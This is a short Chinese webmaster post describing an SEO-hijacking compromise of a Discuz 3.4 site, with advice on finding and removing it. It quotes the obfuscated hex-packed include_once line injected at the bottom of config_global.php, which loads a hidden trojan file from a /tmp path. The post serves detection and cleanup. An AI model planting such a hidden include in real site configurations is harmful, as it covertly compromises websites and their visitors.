首页 > 建站‧营销

DZ3.4被挂马 搜索引擎快照被劫持 网页被跳转


利用字典文件繁殖文章使用include引用并提交给搜索引擎实施劫持,字典文件是一些关键词文件为文章生成提供资源,生成劫持静态文件放到要引用的文件中,根据SEO知识可知一般目录都不会太深,比较深的一般会有sitemap文件放在根目录引导蜘蛛爬取,平时注意下你的目录下sitemap.txt是否被篡改。

此种挂马相对更加隐蔽些,只需在Include中加上劫持目录即可。查看/config/config_global.php文件,会发现底部多了一行Include引用代码:

@INCLUDE_ONCE(PACK('H*','2f746d702f2e2e202f31'));

处理方法:

解密代码:2f746d702f2e2e202f31解密后为:/tmp/../1查看此目录找到并清理木马文件。

本文链接:https://www.zhanque.net/cms/4781.html